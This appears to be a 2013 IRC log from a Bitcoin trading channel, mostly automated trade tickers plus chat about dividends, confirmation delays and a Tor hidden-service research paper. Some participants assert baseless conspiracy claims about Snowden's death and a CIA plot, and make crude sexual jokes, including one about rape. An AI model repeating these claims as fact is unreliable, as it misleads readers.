[HAVELOCK] [ASICM] 249 @ 0.02492 = 6.2051 BTC [-] Jun 12 03:23:32 [BTCTC] [TAT.ASICMINER] 15 @ 0.025185 = 0.3778 BTC [+] Jun 12 03:37:42 [MPEX] [S.MPOE] 7549 @ 0.00073076 = 5.5165 BTC [+] Jun 12 03:37:44 [MPEX] [S.MPOE] 1849 @ 0.00072797 = 1.346 BTC [-] Jun 12 03:45:07 [HAVELOCK] [ASICM] 6 @ 0.02538999 = 0.1523 BTC [+] Jun 12 03:45:07 [HAVELOCK] [ASICM] 49 @ 0.02539 = 1.2441 BTC [+] Jun 12 03:47:25 [BTCTC] [DMS.SELLING] 7 @ 0.034107 = 0.2387 BTC [+] Jun 12 03:47:28 [BTCTC] [DMS.SELLING] 66 @ 0.034101 = 2.2507 BTC [-] Jun 12 03:49:10 [BTCTC] [DMS.MINING] 23 @ 0.031 = 0.713 BTC [+] Jun 12 03:49:13 [BTCTC] [DMS.MINING] 50 @ 0.031 = 1.55 BTC [+] Jun 12 03:49:14 [BTCTC] [DMS.MINING] 8 @ 0.032 = 0.256 BTC [+] Jun 12 03:50:39 http://www.infosecurity-magazine.com/view/32889/pirate-bay-founder-wanted-for-danish-hack/ Jun 12 03:53:32 [HAVELOCK] [VTX] 6 @ 0.4601 = 2.7606 BTC [+] Jun 12 03:53:54 [BTCTC] [DMS.SELLING] 1 @ 0.03521 BTC [+] Jun 12 03:54:10 [BTCTC] [DMS.SELLING] 3 @ 0.0361 = 0.1083 BTC [+] Jun 12 04:04:08 [BTCTC] [TAT.ASICMINER] 49 @ 0.025185 = 1.2341 BTC [+] Jun 12 04:04:54 [BTCTC] [S.DICE-PT] 1 @ 0.002777 BTC [+] Jun 12 04:05:28 [BTCTC] [TAT.ASICMINER] 29 @ 0.025185 = 0.7304 BTC [+] Jun 12 04:06:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.025185 BTC [+] Jun 12 04:07:20 [BTCTC] [ASICMINER-PT] 1 @ 2.5179 BTC [-] Jun 12 04:12:49 [HAVELOCK] [ASICM] 8 @ 0.02539 = 0.2031 BTC [+] Jun 12 04:15:15 [BTCTC] [TAT.ASICMINER] 4 @ 0.025185 = 0.1007 BTC [+] Jun 12 04:29:04 [BTCTC] [TAT.ASICMINER] 8 @ 0.025185 = 0.2015 BTC [+] Jun 12 04:38:11 [MPEX] [S.MPOE] 4321 @ 0.00072395 = 3.1282 BTC [-] Jun 12 04:38:35 [MPEX] [S.MPOE] 183 @ 0.00072388 = 0.1325 BTC [-] Jun 12 04:38:36 [MPEX] [S.MPOE] 9952 @ 0.00072387 = 7.204 BTC [-] Jun 12 04:38:45 [MPEX] [S.MPOE] 321 @ 0.00072153 = 0.2316 BTC [-] Jun 12 04:38:47 [MPEX] [S.MPOE] 1736 @ 0.00072029 = 1.2504 BTC [-] Jun 12 04:38:49 [MPEX] [S.MPOE] 2000 @ 0.00072008 = 1.4402 BTC [-] Jun 12 04:38:50 [MPEX] [S.MPOE] 4322 @ 0.00072008 = 3.1122 BTC [-] Jun 12 04:44:20 [BTCTC] [ASICMINER-PT] 3 @ 2.5199 = 7.5597 BTC [+] Jun 12 04:44:22 [BTCTC] [ASICMINER-PT] 2 @ 2.5199 = 5.0398 BTC [+] Jun 12 04:57:48 [BTCTC] [ASICMINER-PT] 2 @ 2.51999 = 5.04 BTC [+] Jun 12 04:57:50 [BTCTC] [ASICMINER-PT] 1 @ 2.52 BTC [+] Jun 12 04:58:28 [BTCTC] [ASICMINER-PT] 19 @ 2.5248 = 47.9712 BTC [+] Jun 12 04:59:27 [BTCTC] [ASICMINER-PT] 1 @ 2.51998 BTC [-] Jun 12 04:59:29 [BTCTC] [ASICMINER-PT] 1 @ 2.527 BTC [+] Jun 12 04:59:33 [BTCTC] [ASICMINER-PT] 2 @ 2.527 = 5.054 BTC [+] Jun 12 04:59:37 [BTCTC] [ASICMINER-PT] 18 @ 2.5283 = 45.5094 BTC [+] Jun 12 05:00:34 [BTCTC] [ASICMINER-PT] 8 @ 2.52 = 20.16 BTC [-] Jun 12 05:02:04 [BTCTC] [ASICMINER-PT] 10 @ 2.525 = 25.25 BTC [+] Jun 12 05:05:18 [BTCTC] [DMS.MINING] 5 @ 0.03144 = 0.1572 BTC [-] Jun 12 05:10:19 [HAVELOCK] [ASICM] 10 @ 0.02535 = 0.2535 BTC [-] Jun 12 05:11:50 [BTCTC] [ASICMINER-PT] 3 @ 2.524 = 7.572 BTC [-] Jun 12 05:11:53 [BTCTC] [ASICMINER-PT] 11 @ 2.525 = 27.775 BTC [+] Jun 12 05:19:03 [BTCTC] [ASICMINER-PT] 3 @ 2.525 = 7.575 BTC [+] Jun 12 05:19:05 [BTCTC] [ASICMINER-PT] 9 @ 2.526 = 22.734 BTC [+] Jun 12 05:21:17 [HAVELOCK] [ASICM] 6 @ 0.02500001 = 0.15 BTC [-] Jun 12 05:21:18 [HAVELOCK] [ASICM] 100 @ 0.025 = 2.5 BTC [-] Jun 12 05:21:18 [HAVELOCK] [ASICM] 100 @ 0.025 = 2.5 BTC [-] Jun 12 05:21:19 [HAVELOCK] [ASICM] 1994 @ 0.025 = 49.85 BTC [-] Jun 12 05:21:45 [MPEX] [S.MPOE] 2000 @ 0.00071092 = 1.4218 BTC [-] Jun 12 05:30:54 [MPEX] [S.MPOE] 11550 @ 0.00071092 = 8.2111 BTC [-] Jun 12 05:31:57 [BTCTC] [TAT.ASICMINER] 23 @ 0.025185 = 0.5793 BTC [+] Jun 12 05:31:58 [BTCTC] [TAT.ASICMINER] 9 @ 0.025185 = 0.2267 BTC [+] Jun 12 05:33:15 [BTCTC] [ASICMINER-PT] 1 @ 2.5283 BTC [+] Jun 12 05:37:56 [BTCTC] [DMS.MINING] 10 @ 0.030492 = 0.3049 BTC [-] Jun 12 05:40:13 [BTCTC] [ASICMINER-PT] 1 @ 2.529 BTC [+] Jun 12 05:41:09 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.007601 = 0.7601 BTC [-] Jun 12 05:41:13 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.0076 = 0.152 BTC [-] Jun 12 05:41:22 [BTCTC] [TAT.VIRTUALMINE] 13 @ 0.0076 = 0.0988 BTC [-] Jun 12 05:41:31 [BTCTC] [TAT.ASICMINER] 65 @ 0.025185 = 1.637 BTC [+] Jun 12 05:46:21 [HAVELOCK] [ASICM] 15 @ 0.02539 = 0.3809 BTC [+] Jun 12 05:48:59 [BTCTC] [DMS.MINING] 10 @ 0.030491 = 0.3049 BTC [-] Jun 12 05:49:00 [BTCTC] [DMS.MINING] 35 @ 0.030492 = 1.0672 BTC [+] Jun 12 05:51:11 [HAVELOCK] [HIM] 1 @ 0.2934 BTC [+] Jun 12 06:00:28 [HAVELOCK] [SDICE] 2 @ 0.2131 = 0.4262 BTC [-] Jun 12 06:00:29 [HAVELOCK] [SDICE] 1 @ 0.213 BTC [-] Jun 12 06:00:30 [HAVELOCK] [SDICE] 5 @ 0.212 = 1.06 BTC [-] Jun 12 06:00:31 [HAVELOCK] [SDICE] 5 @ 0.21111 = 1.0556 BTC [-] Jun 12 06:00:32 [HAVELOCK] [SDICE] 7 @ 0.21031 = 1.4722 BTC [-] Jun 12 06:08:31 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00751 = 0.0751 BTC [-] Jun 12 06:12:06 [BTCTC] [COGNITIVE] 1 @ 0.301 BTC [+] Jun 12 06:12:38 [BTCTC] [COGNITIVE] 1 @ 0.301 BTC [+] Jun 12 06:12:46 VIRTUALMINE Jun 12 06:13:02 mining virtue one virgin at a time Jun 12 06:16:24 It can get to around 200 in the next few weeks. Jun 12 06:16:32 what the Jun 12 06:17:11 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00745 = 0.745 BTC [-] Jun 12 06:17:21 http://www.ieee-security.org/TC/SP2013/papers/4977a080.pdf Jun 12 06:17:24 epic read Jun 12 06:17:32 [BTCTC] [TAT.ASICMINER] 4 @ 0.025185 = 0.1007 BTC [+] Jun 12 06:18:02 [HAVELOCK] [ASICM] 166 @ 0.02539 = 4.2147 BTC [+] Jun 12 06:18:40 this looks good jcpham thanks for sharing i dig this stuff Jun 12 06:20:11 [MPEX] [S.MPOE] 2800 @ 0.00071046 = 1.9893 BTC [-] Jun 12 06:23:03 [BTCTC] [COGNITIVE] 1 @ 0.301 BTC [+] Jun 12 06:27:02 As a proof of concept we used this approach to control Jun 12 06:27:03 one of the six hidden service directories of the discovered Jun 12 06:27:03 Tor botnet, the Silk Road hidden service, and the DuckDuckGo hidden service. We tracked these for several days Jun 12 06:27:03 and obtained the following measurements: (1) The number Jun 12 06:27:03 of requests for the hidden service descriptor per day (see Jun 12 06:27:03 [BTCTC] [S.DICE-PT] 3 @ 0.002777 = 0.0083 BTC [+] Jun 12 06:27:03 Tables I and II) and (2) the rate of requests over the course Jun 12 06:27:03 of a day, which is shown in Figure 4 (each point corresponds Jun 12 06:27:04 to the number of hidden service descriptor requests per one Jun 12 06:27:04 hour) Jun 12 06:27:10 big spam wall o text Jun 12 06:30:24 [BTCTC] [DMS.PURCHASE] 300 @ 0.066195 = 19.8585 BTC [+] Jun 12 06:31:35 [BTCTC] [TAT.ASICMINER] 19 @ 0.0251 = 0.4769 BTC [-] Jun 12 06:31:38 [BTCTC] [TAT.ASICMINER] 23 @ 0.025003 = 0.5751 BTC [-] Jun 12 06:31:42 [BTCTC] [TAT.ASICMINER] 71 @ 0.025002 = 1.7751 BTC [-] Jun 12 06:40:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.025185 = 0.0504 BTC [+] Jun 12 06:41:16 [BTCTC] [TAT.ASICMINER] 3 @ 0.025185 = 0.0756 BTC [+] Jun 12 06:55:16 Apparently feathercoin has had 2 51% attacks this month starting dozens of blocks deep? Jun 12 06:55:21 lol Jun 12 06:55:48 [HAVELOCK] [SDICE] 6 @ 0.2006 = 1.2036 BTC [-] Jun 12 06:55:49 [HAVELOCK] [SDICE] 3 @ 0.20051 = 0.6015 BTC [-] **** BEGIN LOGGING AT Wed Jun 12 16:30:48 2013 Jun 12 16:33:45 [BTCTC] [TAT.ASICMINER] 10 @ 0.02531 = 0.2531 BTC [+] Jun 12 16:37:04 [MPEX] [S.MPOE] 11213 @ 0.00071403 = 8.0064 BTC [+] Jun 12 16:37:19 [MPEX] [S.MPOE] 2856 @ 0.00071404 = 2.0393 BTC [+] Jun 12 16:44:35 [BTCTC] [TAT.ASICMINER] 7 @ 0.02531 = 0.1772 BTC [+] Jun 12 16:46:32 [BTCTC] [DMS.MINING] 12 @ 0.030988 = 0.3719 BTC [+] Jun 12 16:46:33 [BTCTC] [DMS.MINING] 4 @ 0.030988 = 0.124 BTC [+] Jun 12 16:50:09 [BTCTC] [DMS.MINING] 10 @ 0.03 = 0.3 BTC [-] Jun 12 16:50:11 [BTCTC] [DMS.MINING] 6 @ 0.03 = 0.18 BTC [-] Jun 12 16:56:44 [BTCTC] [DMS.MINING] 45 @ 0.029999 = 1.35 BTC [-] Jun 12 16:59:11 [BTCTC] [TAT.ASICMINER] 5 @ 0.025399 = 0.127 BTC [+] Jun 12 16:59:12 [BTCTC] [TAT.ASICMINER] 80 @ 0.025399 = 2.0319 BTC [+] Jun 12 17:01:39 [HAVELOCK] [ASICM] 1 @ 0.0253 BTC [-] Jun 12 17:01:54 [HAVELOCK] [ASICM] 1 @ 0.0253 BTC [-] Jun 12 17:03:18 [BTCTC] [ASICMINER-PT] 1 @ 2.54899 BTC [-] Jun 12 17:09:54 [BTCTC] [TAT.ASICMINER] 20 @ 0.025399 = 0.508 BTC [+] Jun 12 17:10:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.0254 BTC [+] Jun 12 17:11:03 [BTCTC] [TAT.ASICMINER] 12 @ 0.0254 = 0.3048 BTC [+] Jun 12 17:11:14 [BTCTC] [TAT.ASICMINER] 10 @ 0.0254 = 0.254 BTC [+] Jun 12 17:11:45 [BTCTC] [TAT.ASICMINER] 13 @ 0.0254 = 0.3302 BTC [+] Jun 12 17:13:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.0254 BTC [+] Jun 12 17:15:21 Won 22 out of 23 bets on bitbet. Only 1.3 BTC to show for it :( Lol. Jun 12 17:16:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.0254 BTC [+] Jun 12 17:17:28 ASICMINER dividend announced: 0.03628311 per whole-share! (before TAT management fees) Jun 12 17:18:00 whoa Jun 12 17:18:12 that's what 10%? Jun 12 17:18:37 about 1.4% weekly Jun 12 17:19:04 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.0071 = 0.0568 BTC [-] Jun 12 17:20:21 Neil so buy me dinner. Jun 12 17:20:34 damn Jun 12 17:20:43 [BTCTC] [BTC-BOND] 98 @ 0.009841 = 0.9644 BTC [-] Jun 12 17:20:47 that's nice. beers on you TAT Jun 12 17:20:47 0.03628311 * 0.95 = 0.0344689545 :) Jun 12 17:21:02 Neil, shoulda bet more? Jun 12 17:21:22 [BTCTC] [DMS.MINING] 1 @ 0.029201 BTC [-] Jun 12 17:21:53 [MPEX] [S.MPOE] 8094 @ 0.00071404 = 5.7794 BTC [+] Jun 12 17:21:58 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [+] Jun 12 17:22:00 [BTCTC] [ASICMINER-PT] 1 @ 2.5496 BTC [+] Jun 12 17:22:09 [BTCTC] [TAT.ASICMINER] 4 @ 0.0254 = 0.1016 BTC [+] Jun 12 17:22:31 [BTCTC] [ASICMINER-PT] 1 @ 2.5498 BTC [+] Jun 12 17:23:25 [10:20] 0.03628311 * 0.95 = 0.0344689545 :) <<<<< more accurately, 0.000344689545 per share ;) Jun 12 17:23:31 rather, Jun 12 17:23:43 0.00034469 Jun 12 17:23:44 [BTCTC] [TAT.ASICMINER] 32 @ 0.0254 = 0.8128 BTC [+] Jun 12 17:27:45 [BTCTC] [BASIC-MINING] 1 @ 0.675001 BTC [-] Jun 12 17:27:47 [BTCTC] [BASIC-MINING] 1 @ 0.675 BTC [-] Jun 12 17:28:22 [BTCTC] [TAT.ASICMINER] 20 @ 0.0254 = 0.508 BTC [+] Jun 12 17:28:42 [BTCTC] [BASIC-MINING] 2 @ 0.67 = 1.34 BTC [-] Jun 12 17:28:51 mircea_popescu: Already buying your dinner I think, what with all the 1%s. Jun 12 17:29:01 [BTCTC] [ASICMINER-PT] 1 @ 2.548 BTC [-] Jun 12 17:29:23 1%s of 1.4 btc ?! Jun 12 17:29:50 No, I've bet about 60BTC. Most not resolved yet. Jun 12 17:30:07 ThickAsThieves: exactly Jun 12 17:30:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.0254 = 0.0508 BTC [+] Jun 12 17:30:16 [BTCTC] [TAT.ASICMINER] 3 @ 0.0255 = 0.0765 BTC [+] Jun 12 17:31:48 ;;bc,stats Jun 12 17:31:49 Current Blocks: 241124 | Current Difficulty: 1.5605632681285927E7 | Next Difficulty At Block: 241919 | Next Difficulty In: 795 blocks | Next Difficulty In About: 4 days, 1 hour, 50 minutes, and 46 seconds | Next Difficulty Estimate: 18937543.7152 | Estimated Percent Change: 21.35069 Jun 12 17:31:52 ;;estimate Jun 12 17:31:53 Next difficulty estimate | 18937543.7152 based on data since last change | 20055302.1316 based on data for last three days Jun 12 17:32:53 Feels like the miners have given up. Jun 12 17:35:42 [BTCTC] [DMS.PURCHASE] 100 @ 0.066195 = 6.6195 BTC [+] Jun 12 17:36:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.0256 BTC [+] Jun 12 17:37:27 Francis Place later wrote that enjoyments for the poor of this time were limited: they had often had only two, "sexual intercourse and drinking", and that "drunkenness is by far the most desired" as it was cheaper and its effects more enduring. Jun 12 17:40:57 but now we have porn Jun 12 17:43:09 right. meanwhile it's masturbation and internet. Jun 12 17:43:12 both much cheaper. Jun 12 17:47:42 [BTCTC] [TAT.ASICMINER] 7 @ 0.0256 = 0.1792 BTC [+] Jun 12 17:47:59 [BTCTC] [S.DICE-PT] 13 @ 0.002774 = 0.0361 BTC [-] Jun 12 17:48:36 I'm quite impressed at how long the EU has managed to keep the farce going. I expected it to collapse about 12 months ago. Jun 12 17:49:14 [BTCTC] [ASICMINER-PT] 1 @ 2.548 BTC [-] Jun 12 17:49:18 yeah, people said the sort of crap 1-2-3 years ago, and i said 1-2-3 years ago the us goes first. Jun 12 17:49:19 it does. Jun 12 17:49:20 [BTCTC] [S.DICE-PT] 13 @ 0.002775 = 0.0361 BTC [+] Jun 12 17:49:38 Hmm, not sure about that. Jun 12 17:49:47 in eu everything in on paper and paper can bear anything Jun 12 17:49:50 Could still be Japan first :) Jun 12 17:50:17 as opposed to us, where the gold just went *poof* and can't be replaced by paper easily Jun 12 17:50:39 japan isn't going anywhere. Jun 12 17:51:04 mircea_popescu: Why do you say that? Not saying I disagree; I suspect they can hold on longer than most. Jun 12 17:51:09 [BTCTC] [TAT.ASICMINER] 80 @ 0.0256 = 2.048 BTC [+] Jun 12 17:51:33 Neil purely cultural reasons. during the azn crisis many years ago the people were queuing to give out their family jools to prop up the governemnt. Jun 12 17:52:06 in any dispute of the sort the nations go last. Jun 12 17:52:10 [BTCTC] [S.DICE-PT] 84 @ 0.002778 = 0.2334 BTC [+] Jun 12 17:52:45 Faith in the bureaucracy is quite strong; surprisingly even amongst those who are most skeptical about things. Kinda sad really. Jun 12 17:53:12 Just means that when the SHTF, it'll be even more devastating. Jun 12 17:53:18 not so. Jun 12 17:53:19 mircea_popescu: I think I'm ready to post to MPOE-PR Jun 12 17:53:26 Tell her not to rape me. Jun 12 17:53:31 It's my first time. Jun 12 17:53:31 take the case of serbia, which played out, courtesy of teh merican intervention. Jun 12 17:53:39 the state collapsed, the serbs showed up to work as usual Jun 12 17:53:46 there was no currency and no salaries were being paid. Jun 12 17:53:52 no, tell mpoe-pr to got into overdrive Jun 12 17:53:57 *get Jun 12 17:54:00 there's a huge difference between a nation and a bunch of people. Jun 12 17:54:17 thestringpuller dude you've been hatching this for three days lol. relax, it's just teh internets. Jun 12 17:54:28 [BTCTC] [B.YABMC] 11 @ 0.011407 = 0.1255 BTC [-] Jun 12 17:54:33 [BTCTC] [B.YABMC] 30 @ 0.011406 = 0.3422 BTC [-] Jun 12 17:54:37 [BTCTC] [B.YABMC] 10 @ 0.011265 = 0.1127 BTC [-] Jun 12 17:54:48 Is MPOE-PR Romanian? Jun 12 17:54:56 [BTCTC] [B.YABMC] 211 @ 0.011131 = 2.3486 BTC [-] Jun 12 17:54:58 [BTCTC] [B.YABMC] 10 @ 0.011 = 0.11 BTC [-] Jun 12 17:55:10 nope Jun 12 17:55:17 heh Jun 12 17:55:24 Must be English then. Jun 12 17:56:07 she's from california. Jun 12 17:56:10 Feel sorry for anyone waiting for 6 confirms at the moment. Jun 12 17:56:20 [BTCTC] [TAT.ASICMINER] 2 @ 0.023 = 0.046 BTC [-] Jun 12 17:57:02 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [+] Jun 12 17:57:57 [BTCTC] [ASICMINER-PT] 9 @ 2.549798 = 22.9482 BTC [+] Jun 12 17:59:05 [MPEX] [S.MPOE] 18621 @ 0.00071404 = 13.2961 BTC [+] Jun 12 17:59:45 [BTCTC] [TAT.ASICMINER] 5 @ 0.025649 = 0.1282 BTC [+] Jun 12 18:03:00 Woman charged with smuggling $57K in cash stuffed in her and her daughter's bra. Jun 12 18:03:09 i guess it's time for a new bra measure. Jun 12 18:04:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.025649 = 0.0769 BTC [+] Jun 12 18:04:17 [BTCTC] [TAT.ASICMINER] 30 @ 0.02555 = 0.7665 BTC [-] Jun 12 18:04:35 Goat could do that with his gold casascius coin Jun 12 18:05:02 [BTCTC] [CRYPTO-TRADE] 3 @ 0.166427 = 0.4993 BTC [+] Jun 12 18:05:08 Sorry goat, didn't mean to give away your bra secret. Jun 12 18:06:22 [BTCTC] [ASICMINER-PT] 2 @ 2.549 = 5.098 BTC [-] Jun 12 18:06:25 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [-] Jun 12 18:06:25 [BTCTC] [ASICMINER-PT] 3 @ 2.549799 = 7.6494 BTC [+] Jun 12 18:07:31 [BTCTC] [S.DICE-PT] 20 @ 0.002787 = 0.0557 BTC [+] Jun 12 18:08:01 mircea_popescu: I like to turtle! Jun 12 18:08:10 Why are confirmation times so bad now? Jun 12 18:08:15 ;;tslb Jun 12 18:08:19 Time since last block: 2 minutes and 2 seconds Jun 12 18:08:22 hm ? Jun 12 18:08:22 even with fee Jun 12 18:09:04 20 minutes ago i sent 1 btc with fee and still has not received a single confirm Jun 12 18:09:07 lol Jun 12 18:09:37 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [-] Jun 12 18:09:58 yeah well, teh problem of network connectivity is still largely unadressed Jun 12 18:10:10 basically, either have a good node or get friendly with someone who does. Jun 12 18:10:27 [BTCTC] [ASICMINER-PT] 3 @ 2.549 = 7.647 BTC [-] Jun 12 18:10:43 a 0.56 btc transaction with fee paid of 0.01 1h 20 minutes ago has only 2 confirms Jun 12 18:10:44 the days of "i'm entitled to propagation because i run the stock client" are gone, just as the days of "i expect to solve blocks on my cpu" are gone Jun 12 18:11:19 yeah, 7 blocks past 2 hours. there was a long one. Jun 12 18:11:21 [HAVELOCK] [KCIM] 2 @ 1.1699 = 2.3398 BTC [+] Jun 12 18:11:35 two, really. Jun 12 18:11:38 wow btc is like catching up on the economy problems from 1900's all the way up to now Jun 12 18:12:27 going through a similar evolutionary process, just 10k times faster Jun 12 18:12:28 [BTCTC] [TAT.VIRTUALMINE] 11 @ 0.0073 = 0.0803 BTC [+] Jun 12 18:12:33 [BTCTC] [TAT.ASICMINER] 97 @ 0.0255 = 2.4735 BTC [-] Jun 12 18:12:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.0255 BTC [-] Jun 12 18:12:54 [BTCTC] [BASIC-MINING] 1 @ 0.689999 BTC [+] Jun 12 18:12:54 [BTCTC] [BASIC-MINING] 5 @ 0.69 = 3.45 BTC [+] Jun 12 18:13:36 lipopper, you can not have more confirms than blocks that have been found for the time period Jun 12 18:13:51 I do not understand what you are not understanding Jun 12 18:14:11 [BTCTC] [DMS.MINING] 29 @ 0.029997 = 0.8699 BTC [+] Jun 12 18:15:36 [BTCTC] [BTC-BOND] 63 @ 0.009995 = 0.6297 BTC [+] Jun 12 18:15:45 I understand Jun 12 18:16:01 I'm just saying, they're going to have to address that at some point Jun 12 18:16:12 and it's starting to look like it'll become an issue sooner than later Jun 12 18:16:46 or maybe that's a job for a separate currency Jun 12 18:16:50 like the ripples lol Jun 12 18:16:52 [BTCTC] [ASICMINER-PT] 2 @ 2.548 = 5.096 BTC [-] Jun 12 18:17:06 no way Jun 12 18:17:11 [BTCTC] [ASICMINER-PT] 1 @ 2.548 BTC [-] Jun 12 18:17:18 ltc/ftc? Jun 12 18:17:34 [HAVELOCK] [SDICE] 3 @ 0.2394 = 0.7182 BTC [-] Jun 12 18:17:40 no, and your example doesn't show a problem Jun 12 18:17:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.02565 = 0.0513 BTC [+] Jun 12 18:18:35 [HAVELOCK] [SDICE] 9 @ 0.2395 = 2.1555 BTC [+] Jun 12 18:18:55 [BTCTC] [TAT.ASICMINER] 20 @ 0.025331 = 0.5066 BTC [-] Jun 12 18:19:03 [BTCTC] [TAT.ASICMINER] 5 @ 0.02533 = 0.1267 BTC [-] Jun 12 18:19:18 2 hours for 2 confirms is not really a problem? Jun 12 18:19:36 [HAVELOCK] [HIM] 1 @ 0.28 BTC [+] Jun 12 18:19:41 It's still faster than banks Jun 12 18:19:50 [BTCTC] [TAT.ASICMINER] 5 @ 0.02531 = 0.1266 BTC [-] Jun 12 18:20:06 but I dread the day it takes over a day to send a btc to someone. Jun 12 18:20:13 [BTCTC] [ASICMINER-PT] 1 @ 2.548 BTC [-] Jun 12 18:20:18 you do not understand, I am sorry Jun 12 18:20:52 I understand that blocks must be discovered in order for your transactions to get confirmations Jun 12 18:21:40 but maybe I do not understand Jun 12 18:21:40 you do not understand the rate/diff and timing the mathematics builds in Jun 12 18:22:20 diff is always rising Jun 12 18:22:33 no, that is not true Jun 12 18:22:40 hashpower is too Jun 12 18:22:40 it has been true Jun 12 18:22:52 diff and hashpower are the same thing Jun 12 18:23:11 so the rate of block discovered has been steady Jun 12 18:23:12 [BTCTC] [TAT.ASICMINER] 11 @ 0.025649 = 0.2821 BTC [+] Jun 12 18:23:26 no, the rate of block creation has been rising Jun 12 18:23:38 hence rising diff Jun 12 18:25:39 [BTCTC] [DMS.MINING] 70 @ 0.029997 = 2.0998 BTC [+] Jun 12 18:25:57 If diff rises sharply and say AM has a fire and a whole building goes down. We are going to have very slow confirms for a finite period of blocks Jun 12 18:25:57 [BTCTC] [ASICMINER-PT] 2 @ 2.548 = 5.096 BTC [-] Jun 12 18:26:42 but that is understood, and will self regulate into the future. Exactly why AM is selling to the public- or one of the reasons Jun 12 18:26:52 cool Jun 12 18:26:58 besides people overpaying for product Jun 12 18:28:58 [BTCTC] [TAT.ASICMINER] 9 @ 0.025649 = 0.2308 BTC [+] Jun 12 18:29:59 [BTCTC] [TAT.ASICMINER] 2 @ 0.02565 = 0.0513 BTC [+] Jun 12 18:30:26 [BTCTC] [TAT.ASICMINER] 2 @ 0.02565 = 0.0513 BTC [+] Jun 12 18:30:43 [BTCTC] [ASICMINER-PT] 2 @ 2.549 = 5.098 BTC [+] Jun 12 18:30:50 yeah Jun 12 18:30:53 crazy dollar values Jun 12 18:32:24 so basically the cia had a little get together, decided this is the end, snowden agreed to be the public face Jun 12 18:32:35 his friends have now dissapeared him, and basically... this is the end. Jun 12 18:32:38 [BTCTC] [ASICMINER-PT] 2 @ 2.549799 = 5.0996 BTC [+] Jun 12 18:32:51 the soviet union collapsed within weeks of the secret service defecting. Jun 12 18:32:56 [BTCTC] [TAT.ASICMINER] 3 @ 0.025696 = 0.0771 BTC [+] Jun 12 18:33:01 [BTCTC] [TAT.ASICMINER] 47 @ 0.025699 = 1.2079 BTC [+] Jun 12 18:33:08 you see Russia offered him asylum Jun 12 18:33:21 [BTCTC] [DMS.MINING] 1 @ 0.029998 BTC [+] Jun 12 18:33:22 [BTCTC] [DMS.MINING] 22 @ 0.0305 = 0.671 BTC [+] Jun 12 18:33:29 he doesn't really need it Jun 12 18:33:37 not much more than putin needed us asylum in 1990 Jun 12 18:33:39 [BTCTC] [ASICMINER-PT] 3 @ 2.549799 = 7.6494 BTC [+] Jun 12 18:33:51 Naw, there are many places that would take him happily Jun 12 18:33:53 [BTCTC] [ASICMINER-PT] 1 @ 2.549799 BTC [+] Jun 12 18:34:17 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0073 = 0.0146 BTC [+] Jun 12 18:34:18 snowden is a public face like bin laden Jun 12 18:34:39 they killed snowden and dumped his body in an ocean Jun 12 18:34:41 the end Jun 12 18:34:55 you watch too much cable. Jun 12 18:35:01 lol Jun 12 18:35:04 [BTCTC] [ASICMINER-PT] 2 @ 2.549 = 5.098 BTC [-] Jun 12 18:35:14 "they" are pissing "their" pants in sheer terror atm. Jun 12 18:35:26 huddling in a corner somewhere, alone. Jun 12 18:35:56 you mean the NSA is? Jun 12 18:36:10 imo, this whole thing will blow over Jun 12 18:36:12 who's defecting the NSA or the CIA? Jun 12 18:36:15 we are a nation of idiots Jun 12 18:36:25 People don't want to think Jun 12 18:36:54 The most I heard is "Well we're not saying that any laws were broken but it's surprising that they didn't have to in order to do this" Jun 12 18:36:55 lippopper the alphabet soup compartimentalisation is of little practical consequence Jun 12 18:37:07 a bureaucratic endeavour. secret service means secret service, one thing. Jun 12 18:37:08 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [-] Jun 12 18:38:04 [BTCTC] [ASICMINER-PT] 4 @ 2.549799 = 10.1992 BTC [+] Jun 12 18:38:22 [BTCTC] [DMS.MINING] 1 @ 0.0296 BTC [-] Jun 12 18:38:43 [BTCTC] [DMS.MINING] 100 @ 0.0295 = 2.95 BTC [-] Jun 12 18:38:45 [BTCTC] [DMS.MINING] 50 @ 0.0295 = 1.475 BTC [-] Jun 12 18:38:45 apparently the beheading of petraeus didn't work. Jun 12 18:39:00 anyone have a contact for DarkEmi or the other guy who runs btcoracle.com? Jun 12 18:39:11 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0073 BTC [+] Jun 12 18:39:57 "Got temporary error 20016 'Query aborted due to node failure' from NDBCLUSTER" Lol Jun 12 18:40:26 and it's down Jun 12 18:40:29 blockchain.info Jun 12 18:40:36 same Jun 12 18:41:08 yeah something cracked. Jun 12 18:41:16 Click on the most recent block and you get "unknown error". Jun 12 18:41:22 i think nodes are being ddosed Jun 12 18:41:35 mpex too? Jun 12 18:41:48 i lost a server earlier today, wasn't running mpex anything but wasd doing relaying Jun 12 18:41:59 tho in honesty by now i get so much flood it's impossible to know what's what. Jun 12 18:42:02 whats weird is i'm logged into blockchain and it works fine Jun 12 18:42:11 but if i load the regular site its borked Jun 12 18:44:44 [BTCTC] [ASICMINER-PT] 2 @ 2.549 = 5.098 BTC [-] Jun 12 18:45:47 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.0071 = 0.0213 BTC [-] Jun 12 18:45:50 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00705 = 0.0705 BTC [-] Jun 12 18:45:52 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00704 BTC [-] Jun 12 18:45:57 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.00701 = 0.0351 BTC [-] Jun 12 18:46:04 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.00701 = 1.402 BTC [-] Jun 12 18:46:17 